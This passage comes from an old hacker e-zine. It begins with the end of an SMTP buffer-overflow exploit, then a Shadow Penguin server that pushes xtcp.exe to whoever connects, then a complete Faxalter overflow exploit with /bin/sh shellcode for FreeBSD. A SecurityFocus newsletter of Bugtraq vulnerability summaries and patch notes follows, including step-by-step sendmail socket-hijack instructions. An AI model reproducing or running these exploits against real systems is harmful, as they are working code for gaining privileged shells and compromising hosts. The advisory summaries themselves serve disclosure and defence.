exploit_code[0x1e]=p2&0xff; exploit_code[0x1f]=(p2>>8)&0xff; exploit_code[0x20]=(p2>>16)&0xff; exploit_code[0x21]=(p2>>24)&0xff; memcpy(buf+JMPADR-strlen(exploit_code)-1,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"HELO UNYUN\n"); send(sock,packetbuf,strlen(packetbuf),0); recv(sock,packetbuf,MAXBUF,0); printf("HELO: Reply from \"%s\" : %s\n",argv[1],packetbuf); sprintf(packetbuf,"MAIL FROM: UNYUN <%s@shadowpenguin.net>\r\n",buf); send(sock,packetbuf,strlen(packetbuf),0); closesocket(sock); printf("Done.\n"); return FALSE; } @HWA 15.0 Exploit Translation Server Version1.00/Shadow Penguin Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za /*============================================================================= Exploit Translation Server Version1.00 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #include #include #include #include #include #include #include #define PORT_NUM 7000 #define BUFSIZE 1000 #define SENDFILE "xtcp.exe" int get_connection(port, listener) int port; int 
*listener; { struct sockaddr_in address,acc; int listening_socket,connected_socket; int reuse_addr=1,acclen=sizeof(acc); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = htons(port); address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, SOCK_STREAM, 0); if (listening_socket < 0) { perror("socket"); exit(1); } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, (void *)&reuse_addr,sizeof(reuse_addr)); if (bind(listening_socket,(struct sockaddr *)&address, sizeof(address))<0){ perror("bind"); exit(1); } listen(listening_socket, 5); connected_socket=accept(listening_socket, (struct sockaddr *)&acc,&acclen); return connected_socket; } int main(argc, argv) int argc; char *argv[]; { int sock,listensock,i,r,l; char buf[BUFSIZE]; struct stat st; FILE *fp; if ((fp=fopen(SENDFILE,"rb"))==NULL){ printf("File not found \"%s\"\n",SENDFILE); exit(1); } stat(SENDFILE,&st); r=st.st_size/BUFSIZE+1; sock = get_connection(PORT_NUM, &listensock); for (i=0;;i++){ l=fread(buf,1,BUFSIZE,fp); if (l<=0) break; write(sock,buf,l); } fclose(fp); close(sock); } @HWA 16.0 Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /* * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) * Brock Tellier btellier@usa.net */ #include char shell[]= /* mudge@lopht.com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */ char buf[bsize]; int eip = 0xbfbfcfad; if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } 
fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4021; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize - 1]='\0'; execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL); }

@HWA

17.0 Security Focus Newsletters #14 and 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SecurityFocus.com Newsletter #14 & 15

Table of Contents:

I. INTRODUCTION
1. New Staff at SecurityFocus.com
2. Elias Levy on National Public Radio

II. BUGTRAQ SUMMARY
1. Multiple Vendor CDE dtappgather Vulnerabilities (Update)
2. Canna subsystem 'uum' Buffer Overflow Vulnerability
3. Canna subsystem 'canuum' Buffer Overflow Vulnerability
4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability
5. BTD Zom-Mail Buffer Overflow Vulnerability
6. AN-HTTPd CGI Vulnerabilities
8. Hylafax 'faxalter' Buffer Overflow Vulnerability
9. Microsoft IE window.open Redirect Vulnerability
10. Real Server Administrator Port Buffer Overflow Vulnerability
11. NT Spoolss.exe Buffer Overflow Vulnerabilities
12. NT Spoolss.exe DLL Insertion Vulnerability
13. Cobalt RaQ2 cgiwrap Vulnerability
14. Alibaba Multiple CGI Vulnerabilities
15. MS ActiveX CAB File Execution Vulnerability
16. Byte Fusion BFTelnet Long Username DoS Vulnerability
17. FTGate Directory Traversal Vulnerability
18. Etype Eserv Directory Traversal Vulnerability
19. Sendmail Socket Hijack Vulnerability
20. Guestbook CGI Remote Command Execution Vulnerability
21. Artisoft XtraMail Multiple DoS Vulnerabilities
22. BigIP Config UI Vulnerabilities
23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability
24. Seyon Relative Path Vulnerability
25. IrfanView32 Image File Buffer Overflow Vulnerability
26.
Linux nfsd Remote Buffer Overflow Vulnerability
27. TransSoft Broker User Name Buffer Overflow Vulnerability
28. Windows 95/98 UNC Buffer Overflow Vulnerability
29. RedHat Linux csh/tcsh Vulnerability
30. Immunix StackGuard Evasion Vulnerability
31. InterScan VirusWall Long HELO Buffer Overflow Vulnerability
32. Multiple BIND Vulnerabilities
33. IMail POP3 Buffer Overflow Denial of Service Vulnerability
34. NetCPlus SmartServer3 POP Buffer Overflow Vulnerability
35. Microsoft ActiveX Error Message Vulnerability
36. MacOS9 NDS Client Inherited Login Vulnerability

III. PATCH UPDATES
1. Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability
2. Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability
3. Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability
4. Vulnerability Patched: Multiple BIND Vulnerabilities
5. Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability
6. Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability
7. Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability
8. Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability
9. Vulnerability Patched: Immunix StackGuard Evasion Vulnerability
10. Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability
11. Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities and NT Spoolss.exe DLL Insertion Vulnerability
12. Vulnerability Patched: FTGate Directory Traversal Vulnerability
13. Vulnerability Patched: AN-HTTPd CGI Vulnerabilities
14. Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability

IV. INCIDENTS SUMMARY
1. possible trojan/virus issue solved (Thread)
2. port 109 (Thread)
3. Re: Logging hosts (Thread)
4. Mail-relaying probing (Thread)

V. VULN-DEV RESEARCH LIST SUMMARY
1. Re: FreeBSD listen() (Thread)
2. ssh-1.2.27 remote buffer overflow - exploitable (Thread)
3. Re: thttpd 2.04 stack overflow (Thread)
4.
MS Outlook javascript parsing bug (Thread)
5. Re: Open Port on Win98 box (Thread)
6. minor (?) mc bug (Thread)
7. [Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread)

VI. SECURITY JOBS
Seeking Staff:
1. Information Security Consultant(s) - #111 - NJ
2. Information Security Analyst - #253 - NJ
3. Sr Firewall Engineer Position
4. Sr. Mgr. Systems Security
5. Security Sales Nationwide
6. Sr. Mgr. Systems Security
7. Software Engineer #4 - Atlanta, GA
8. Website password-protection scripts programmer needed

VII. SECURITY SURVEY RESULTS

VIII. SECURITY FOCUS TOP 6 TOOLS
1. Security Focus Pager (NT/98)
2. Snoot 1.3.1 (UNIX)
3. BUGS 2.0.1 (NT/UNIX)
4. NSS Narr0w Security Scanner (PERL)
5. cgi-check99 v0.3 0.3 (NT/UNIX)
6. guard (UNIX)

IX. SPONSOR INFORMATION - NT OBJECTives, Inc.

X. SUBSCRIBE/UNSUBSCRIBE INFORMATION


I. INTRODUCTION
-----------------

Welcome to the Security Focus 'week in review' newsletter issues 14 & 15 sponsored by NT OBJECTives, Inc.

Issue 14 as you may have guessed failed to be delivered. It seems to have been eaten by a somewhat overworked Listserver. The last two weeks have been two of the busiest in Bugtraq's history with 36 vulnerabilities being published over the list.

1. New Staff at SecurityFocus.com
---------------------------------

We would like to take this opportunity to welcome two newcomers to the SecurityFocus.com team. Joining us are Stephanie Fohn as the Chief Operating Officer at SecurityFocus.com (sfohn@securityfocus.com) and Chip Mesec as the VP of Marketing.

Stephanie Fohn - COO
--------------------

Stephanie has a broad base of management and entrepreneurial experience, with particular expertise in the Internet security area. Most recently, she served as an interim senior management consultant, filling roles such as Vice President of Marketing for Tripwire Security Systems and Director of Distribution Partnerships for Infoseek.
Previously, Stephanie served as director of business development and marketing for Pilot Network Services, Inc., a provider of secure Internet access for corporations. Prior to joining Pilot, Stephanie spent six years in venture capital and investment banking in the technology arena. Stephanie holds an M.S. degree in management from Massachusetts Institute of Technology and bachelor's degrees in business and psychology from University of Washington.

Chip Mesec - VP Marketing
-------------------------

Chip Mesec is responsible for Product and Corporate Marketing at SecurityFocus.com. Prior to joining SecurityFocus.com, Chip was the VP of Marketing with Cyber SIGN Inc., a company that marketed electronic biometric signatures. He has over 12 years of computer security and network experience with positions as Director of Product Management for Security Products at Network Associates Inc., and five years of Product Management and Marketing manager for Network General Corporation, which merged with McAfee Associates to form Network Associates. Prior to joining Network General, Chip served as a development engineer on PC and networking hardware products at AT&T Bell Laboratories.

2. Elias Levy on National Public Radio
--------------------------------------

Elias Levy, aka Aleph One, was interviewed on National Public Radio on the topic of "Cyber Terrorism". RealAudio file available at:
http://www.npr.org/ramfiles/me/19991112.me.10.ram


II. BUGTRAQ SUMMARY 1999-11-02 to 1999-11-14
---------------------------------------------

1. Multiple Vendor CDE dtappgather Vulnerabilities
BugTraq ID: 131
Remote: No
Date Published: 1999-11-03
Relevant URL: http://www.securityfocus.com/bid/131
Summary:

Due to improper checking of ownership, the dtappgather utility shipped with the Common Desktop Environment allows arbitrary users to overwrite any file present on the filesystem, regardless of the owner of the file.
dtappgather uses a directory of permissions 0777 to create temporary files used by each login session. /var/dt/appconfig/appmanager/generic-display-0 is not checked for existence prior to the opening of the file by dtappgather, and as such, if a user were to create a symbolic link from this file to another on the filesystem, the permissions of this file would be changed to 0666.

An additional bug exists whereby dtappgather blindly uses the contents of the DTUSERSESSION environment variable. By setting this variable to point to a file on the filesystem, its permissions can also be changed. As this command takes place relative to the /var/dt/appconfig directory, a series of '..' are required to establish the root directory, after which any file can be altered.

2. Canna subsystem 'uum' Buffer Overflow Vulnerability
BugTraq ID: 757
Remote: No
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/757
Summary:

Canna is a Japanese input system available as free software. Canna provides a unified user interface for inputting Japanese. Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romaji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way. Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.

The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'uum' program. Uum is a Japanese input tty frontend for Canna. Regrettably, certain versions are vulnerable to a buffer overflow attack via unchecked user supplied data with the '-D' option. Since 'uum' is installed as SUID root this may result in a root level compromise.

3. Canna subsystem 'canuum' Buffer Overflow Vulnerability
BugTraq ID: 758
Remote: No
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/758
Summary:

Canna is a Japanese input system available as free software.
Canna provides a unified user interface for inputting Japanese. Canna supports Nemacs(Mule), kinput2 and canuum. All of these tools can be used by a single customization file, romaji-to-kana conversion rules and conversion dictionaries, and input Japanese in the same way. Canna converts kana to kanji based on a client-server model and supports automatic kana-to-kanji conversion.

The Canna subsystem on certain UNIX versions contains a buffer overflow in the 'canuum' program. Canuum is a Japanese input tty frontend for Canna using uum. Certain versions have a buffer overflow via unchecked user supplied data in the -k,-c,-n options. Since this program is installed SUID root this attack will result in a root level compromise.

4. Microsoft IE Yamaha MidiPlug Buffer Overflow Vulnerability
BugTraq ID: 760
Remote: Yes
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/760
Summary:

There is a buffer overflow in the MidiPlug that may allow arbitrary code to be executed on the local host. This overflow occurs if a long "Text" variable is specified within an EMBED tag in a web page. Instructions in the text variable may be executed when a user visits the malicious web page.

5. BTD Zom-Mail Buffer Overflow Vulnerability
BugTraq ID: 761
Remote: Yes
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/761
Summary:

In certain versions of the BTD Zom-Mail server there exists a buffer overflow which may be remotely exploitable by malicious users. The problem in question is in the handling of overly (past 256 chars) long file names for file attachments.

6. AN-HTTPd CGI Vulnerabilities
BugTraq ID: 762
Remote: Yes
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/762
Summary:

Certain versions of the AN-HTTPd server contain default CGI scripts that allow code to be executed remotely. This is due to poor sanity checking on user supplied data.

7.
IBM HomePagePrint Buffer Overflow Vulnerability
BugTraq ID: 763
Remote: Yes
Date Published: 1999-11-02
Relevant URL: http://www.securityfocus.com/bid/763
Summary:

Certain versions of the IBM Web page printout software "IBM HomePagePrint" can in some instances be remotely exploited by malicious webservers. The problem lies in a buffer overflow in the code which handles IMG_SRC tags. If a page containing a specially constructed IMG SRC tag is previewed or printed using the IBM HomePagePrint software, arbitrary code can be run on the client.

8. Hylafax 'faxalter' Buffer Overflow Vulnerability
BugTraq ID: 765
Remote: No
Date Published: 1999-11-03
Relevant URL: http://www.securityfocus.com/bid/765
Summary:

Hylafax is a popular fax server software package designed to run on multiple UNIX operating systems. Some versions of Hylafax ship with a vulnerable sub program 'faxalter'. This program is installed SUID UUCP and has a buffer overflow which if exploited will allow a malicious user to gain UUCP privileges. Because the important programs are executed as root, such as Minicom (a popular modem terminal program) or cu(1) and are in the UUCP group and therefore writable by the same group they could be trojaned by the attacker. A successful scenario in this event would lead to a root compromise.

9. Microsoft IE window.open Redirect Vulnerability
BugTraq ID: 766
Remote: Yes
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/766
Summary:

If window.open is called with a target URL that redirects to a client-side file and then a variable is created pointing to the contents of the new window, the contents of the new window (the local file) can be read and possibly manipulated or transmitted by other code in the webpage.

10.
Real Server Administrator Port Buffer Overflow Vulnerability
BugTraq ID: 767
Remote: Yes
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/767
Summary:

At installation, the Real Server software randomly selects an unused port as the remote administration port. This port is used by Real Server's remote web administration feature. To access this feature, the correct port must be specified and a valid username/password pair must be entered. By sending a long response to this authentication request, the buffer can be overwritten and arbitrary code can be executed on the server.

11. NT Spoolss.exe Buffer Overflow Vulnerabilities
BugTraq ID: 768
Remote: Yes
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/768
Summary:

Spoolss.exe, AKA the spooler service, which handles all print requests for the NT operating system, has a number of APIs with unchecked buffers. Some of these can only be executed by Power Users or Administrators, but some are accessible to all authenticated users. Many of the overflows will write directly into the EIP register, meaning that an exploit could be created to run arbitrary code as SYSTEM.

12. NT Spoolss.exe DLL Insertion Vulnerability
BugTraq ID: 769
Remote: No
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/769
Summary:

The spooler service (spoolss.exe) allows local users to add their own dll files and have the spooler run them at SYSTEM level. This could lead to privilege escalation all the way up to Administrator level. The problem is in the function AddPrintProvider().

13. Cobalt RaQ2 cgiwrap Vulnerability
BugTraq ID: 777
Remote: No
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/777
Summary:

Cobalt RaQ2 servers come with a program called "cgiwrap", which acts as a wrapper for cgi programs so that they run with the uid of their user instead of 'nobody'.
It may be possible to cause a denial of service to websites hosted on the server or compromise web data. cgiwrap interprets subdirectories of web/ in which cgi scripts are run as user directories, and if a user is created which happens to have the same name as the directory which scripts run from - cgiwrap will try to run a file that doesn't exist in that user's directory. In a worse case, a script can be substituted and important data submitted to web forms compromised.

14. Alibaba Multiple CGI Vulnerabilities
BugTraq ID: 770
Remote: Yes
Date Published: 1999-11-03
Relevant URL: http://www.securityfocus.com/bid/770
Summary:

There are several CGI programs that ship with the Alibaba webserver. Many of these do not do proper input handling, and therefore will allow requests for access to files outside of normal or safe webserver practice. This results in various situations where an attacker can view, overwrite, create and delete files anywhere on the server.

15. MS ActiveX CAB File Execution Vulnerability
BugTraq ID: 775
Remote: Yes
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/775
Summary:

A vulnerability in Outlook and Outlook Express allows remote malicious users to execute arbitrary code on the user's machine if Javascript is enabled. A malicious user can create an executable file, compress it into a cab file, and rename it to have a multimedia file extension (e.g. .MID). He can then send this file as an attachment to an Outlook user as well as some Javascript code. When the user double-clicks on the multimedia attachment it will save the executable file in a known location on the system. The Javascript will then execute the attachment on the target machine.

16.
Byte Fusion BFTelnet Long Username DoS Vulnerability
BugTraq ID: 771
Remote: Yes
Date Published: 1999-11-03
Relevant URL: http://www.securityfocus.com/bid/771
Summary:

BFTelnet, a telnet server for Windows NT by Byte Fusion, will crash if a user name of 3090 or more characters is supplied.

17. FTGate Directory Traversal Vulnerability
BugTraq ID: 772
Remote: Yes
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/772
Summary:

Certain versions of the FTGate Advanced Mail Server have a vulnerability in their web based administration interface. The vulnerability is that the webserver allows users to traverse the directory structure outside of the Webroot directory. Therefore malicious users may read files outside of their permitted areas, including but not limited to private email and password files.

18. Etype Eserv Directory Traversal Vulnerability
BugTraq ID: 773
Remote: Yes
Date Published: 1999-11-04
Relevant URL: http://www.securityfocus.com/bid/773
Summary:

Etype's Eserv product is designed to be a one-source internet connectivity solution, incorporating mail, web, ftp, and proxy servers into one package. The web server will allow remote browsing of the entire filesystem by the usage of ../ strings in the URL. This gives an attacker read access to every file on the server's filesystem that the webserver has access to.

19. Sendmail Socket Hijack Vulnerability
BugTraq ID: 774
Remote: No
Date Published: 1999-11-05
Relevant URL: http://www.securityfocus.com/bid/774
Summary:

Through exploiting a combination of seemingly low-risk vulnerabilities in sendmail, it is possible for a malicious local user to have an arbitrary program inherit (or "hijack") the file descriptor for the socket listening on (privileged) port 25.

The problem begins with the way sendmail handles the failure of an accept() call. The accept() call is made when a tcp syn packet is received by a listening tcp socket.
When the three-way handshake does not complete (as is the consequence of a half-open tcp "stealth scan"), accept() fails and sendmail closes all listening sockets and sleeps for 5 seconds.

The second problem is that a user can start the sendmail daemon if a more obscure argument is passed (-bD). The -bD flag tells sendmail to run as a daemon, but in foreground. User privileges are not checked against for this option, allowing any user to start sendmail.

The third problem is how sendmail reacts to a HUP signal. When a HUP is received, sendmail calls execve(argv[0],..) to restart itself. The problem here is obvious, since argv[0] can be changed to anything. The bigger problem here though, is that the fourth file descriptor is not closed before this is done (which happens to be the one for the listening tcp socket), thus any argv[0] which is executed via the execve() call will inherit the descriptor.

The steps required to exploit this are as follows:

- From another machine, use nmap to do a "half open scan" on port 25 of the target host. (this will make sendmail go to sleep for five seconds, unattached to port 25)
- In the 5 seconds that sendmail spends sleeping, call sendmail -bD as a user locally on the target box with noexec and set argv[0] to the program of your choice. (noexec is a program which allows you to set argv[0] to whatever you'd like).
- Send the process a HUP, which is ok since you own the process. (The program you specified in the noexec command which is to be argv[0] now has the file descriptor for the socket listening on port 25).

The consequences of this are full compromise of the mail server. An attacker could write a trojan "mail server" that would respond on port 25 to legitimate smtp connections.

20.
Guestbook CGI Remote Command Execution Vulnerability
BugTraq ID: 776
Remote: Yes
Date Published: 1999-11-05
Relevant URL: http://www.securityfocus.com/bid/776
Summary:

When guest book is configured to allow for HTML posts and you have enabled server-side includes for HTML, it may be possible for an attacker to embed SSI (server-side include) code in guestbook messages. The server-side includes allow for remote command execution, including displaying of any files for which the web server has read access to (see the example):

^^ Does not need to be there.

Apache will accept different formats, which can evade the regular expression in guestbook.pl, executing commands on the target host as they would [if they were put there by the author].

21. Artisoft XtraMail Multiple DoS Vulnerabilities
BugTraq ID: 791
Remote: Yes
Date Published: 1999-11-09
Relevant URL: http://www.securityfocus.com/bid/791
Summary:

There are several unchecked buffers in XtraMail 1.11, which when overflowed will crash the server and cause a denial of service.

1: POP3 server PASS argument
Will be overflowed with a password of over 1500 characters.

2: SMTP server HELO argument
Will be overflowed with a 10,000 character argument to the HELO command.

3: Control service Username
XtraMail includes a remote administration utility which listens on port 32000 for logins. The username buffer will be overflowed with a string of 10,000 characters or more.

22. BigIP Config UI Vulnerabilities
BugTraq ID: 778
Remote: No
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/778
Summary:

BigIP is a load balancing system from F5 software. It has a web-based configuration system, which is vulnerable to several standard CGI attacks. According to Guy Cohen, it is possible to view arbitrary files on the BSDI system which it is installed on. To add to this, the configuration program is installed setuid root.
This is considered a local vulnerability since htaccess authentication is required to get to the configuration area. No more information on this vulnerability is available.

23. Microsoft IE for Win98 file:// Buffer Overflow Vulnerability
BugTraq ID: 779
Remote: Yes
Date Published: 1999-11-09
Relevant URL: http://www.securityfocus.com/bid/779
Summary:

Extremely long 'file://' URLs will overflow a buffer in IE 4 and 5 for Windows 98. The data in the URL gets passed to the EIP, so arbitrary code can be executed if it is included in the long URL.

24. Seyon Relative Path Vulnerability
BugTraq ID: 780
Remote: No
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/780
Summary:

Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the privileges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix.

25. IrfanView32 Image File Buffer Overflow Vulnerability
BugTraq ID: 781
Remote: Yes
Date Published: 1999-11-09
Relevant URL: http://www.securityfocus.com/bid/781
Summary:

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution.

26. Linux nfsd Remote Buffer Overflow Vulnerability
BugTraq ID: 782
Remote: Yes
Date Published: 1999-11-09
Relevant URL: http://www.securityfocus.com/bid/782
Summary:

A remotely exploitable buffer overflow vulnerability was found in versions of Linux nfsd known to ship with Debian Linux 2.1 and RedHat Linux 5.2. When they were fixed in the respective distributions/versions, no vulnerability information was published by the vendors. The vulnerability was in removal of long directory paths on a mounted nfs share.
The length of the string holding the directory name which was to be removed was not checked and the buffer holding it could be overflowed, allowing execution of arbitrary code on the nfs server as root. A consequence of this being exploited is remote root compromise.

27. TransSoft Broker User Name Buffer Overflow Vulnerability
BugTraq ID: 783
Remote: Yes
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/783
Summary:

If a user name of more than 2730 characters is passed to the Broker FTP server software, the program will crash. If the program is running as a service, the service will consume all available memory and crash the entire system.

28. Windows 95/98 UNC Buffer Overflow Vulnerability
BugTraq ID: 792
Remote: Yes
Date Published: 1999-11-02 to 1999-11-14
Relevant URL: http://www.securityfocus.com/bid/792
Summary:

There is an overflowable buffer in the networking code for Windows 95 and 98 (all versions). The buffer is in the part of the code that handles filenames. By specifying an exceptionally long filename, an attacker can cause the machine to crash or execute arbitrary code. This vulnerability could be exploited remotely by including a hostile File: URL or UNC in a web page or HTML email. The attack would occur when the page was loaded in a browser or the email was opened (including opening the email in a preview pane.)

29. RedHat Linux csh/tcsh Vulnerability
BugTraq ID: 785
Remote: No
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/785
Summary:

It may be possible to execute arbitrary commands as a user upon their login if they are using csh/tcsh. The problem has to do with the init scripts for these shells that run when the user logs in and a /tmp race condition which they are vulnerable to.

30.
Immunix StackGuard Evasion Vulnerability
BugTraq ID: 786
Remote: Yes
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/786
Summary:

The following was taken directly from the Immunix advisory:

A significant security vulnerability has been discovered by Mariusz Woloszyn that permits attackers to perpetrate successful attacks against StackGuarded programs under particular circumstances. Woloszyn is preparing a Phrack article describing this vulnerability, which we summarize here. StackGuard 1.21 effectively protects against this vulnerability. The Immunix team would like to thank Mariusz for kindly notifying us first about this vulnerability, and allowing us the time to develop and distribute a defense.

Consider this vulnerable code:

    foo(char * arg) {
        char * p = arg;   // a vulnerable pointer
        char a[25];       // the buffer that makes the pointer vulnerable
        gets(a);          // using gets() makes you vulnerable
        gets(p);          // this is the good part
    }

In attacking this code, the attacker first overflows the buffer a[] with a goal of changing the value of the char * p pointer. Specifically, the attacker can cause the p pointer to point anywhere in memory, but especially at a return address record in an activation record. When the program then takes input and stores it where p points, the input data is stored where the attacker said to store it.

The above attack is effective against the Random and Terminator Canary mechanisms because those methods assume that the attack is linear, i.e. that an attacker seeking to corrupt the return address must necessarily use a string operation that overflows an automatic buffer on the stack, moving up memory through the canary word, and only then reach the return address entry. The above attack form, however, allows the attacker to synthesize a pointer to arbitrary space, including pointing directly at the return address, bypassing canary protection.

31.
InterScan VirusWall Long HELO Buffer Overflow Vulnerability
BugTraq ID: 787
Remote: Yes
Date Published: 1999-11-07
Relevant URL: http://www.securityfocus.com/bid/787
Summary:

There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code on the vulnerable server.

32. Multiple BIND Vulnerabilities
BugTraq ID: 788
Remote: Yes
Date Published: 1999-11-10
Relevant URL: http://www.securityfocus.com/bid/788
Summary:

There are several vulnerabilities in recent BIND packages (pre 8.2.2). The first is a buffer overflow condition which is a result of BIND improperly validating NXT records. The consequence of this being exploited is a remote root compromise (assuming that BIND is running as root, which is default). The second is a denial of service which can occur if BIND does not validate SIG records properly. The next is a bug which allows attackers to cause BIND to consume more file descriptors than can be managed, causing named to crash. The fourth vulnerability is another denial of service which can be caused locally if certain permission conditions are met when validating zone information loaded from disk files. The last is a vulnerability that has to do with closing TCP sockets. If protocols for doing so are not adhered to, BIND can be paused for 120 seconds at a time.

33. IMail POP3 Buffer Overflow Denial of Service Vulnerability
BugTraq ID: 789
Remote: Yes
Date Published: 1999-11-08
Relevant URL: http://www.securityfocus.com/bid/789
Summary:

There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine.

34.
NetCPlus SmartServer3 POP Buffer Overflow Vulnerability
BugTraq ID: 790
Remote: Yes
Date Published: 1999-11-11
Relevant URL: http://www.securityfocus.com/bid/790
Summary:

The POP server that is part of the NetCPlus SmartServer3 email server has an unchecked buffer that could allow an attacker to execute code on the server. If the USER command is followed by an argument of over 800 characters, the input buffer will be overflowed, and data from the argument will be passed to the system to be executed at the privilege level of the SmartServ program.

35. Microsoft ActiveX Error Message Vulnerability
BugTraq ID: 793
Remote: Yes
Date Published: 1999-11-02 to 1999-11-14
Relevant URL: http://www.securityfocus.com/bid/793
Summary:

The Windows Media Player ActiveX control, shipped with IE 5, returns a specific error code if it is instructed to load a local file that does not exist. In this way, an attacker could determine whether or not a specified file on the victim's host exists. This could be used to determine user names and other facets of system configuration.

36. MacOS9 NDS Client Inherited Login Vulnerability
BugTraq ID: 794
Remote: No
Date Published: 1999-11-02 to 1999-11-14
Relevant URL: http://www.securityfocus.com/bid/794
Summary:

The NDS client for MacOS 9 fails to log the user out of the NDS tree when s/he logs out of the MacOS 9 system. The next user to log in to the machine will inherit the previous user's NDS access.

III. PATCH UPDATES 1999-11-02 to 1999-11-02 to 1999-11-14
-------------------------------------------

1. Vendor: Texas Imperial Software
Product: WFTPD and WFTPD Pro
Patch Location: http://www.wftpd.com/
Vulnerability Patched: WFTPD Remote Buffer Overflow Vulnerability
BugTraq ID: 747
Relevant URLS:
http://www.wftpd.com/bugpage.htm
http://www.securityfocus.com/bid/747
Note: This is a new version of WFTPD (2.41). As of Nov 14, 1999, it is only available to registered WFTPD users. The fixed shareware version will be available soon.

2.
Vendor: DataTel Product: Interscan VirusWall Patch Location: http://www.beavuh.org/exploits/V323PTCH.COM Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability BugTraq ID: 787 Relevant URLS: http://www.securityfocus.com/bid/787 Note: The patch was not provided by DataTel. It was a temporary fix supplied by "Beavuh". 3. Vendor: Microsoft Product: Windows 95/98 Patch Location: Windows 95: http://download.microsoft.com/download/win95/update/245729/w95/en-us/245729us5.exe Windows 98: http://download.microsoft.com/download/win98/update/245729/w98/en-us/245729us8.exe Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability BugTraq ID: 792 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/792 4. Vendor: ISC Product: BIND Patch Location: (OS specific patches available to us as of Nov 14) Caldera ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current MD5s db1dda05dbe0f67c2bd2e5049096b42c RPMS/bind-8.2.2p3-1.i386.rpm 82bbe025ac091831904c71c885071db1 RPMS/bind-doc-8.2.2p3-1.i386.rpm 2f9a30444046af551eafd8e6238a50c6 RPMS/bind-utils-8.2.2p3-1.i386.rpm 0e4f041549bdd798cb505c82a8911198 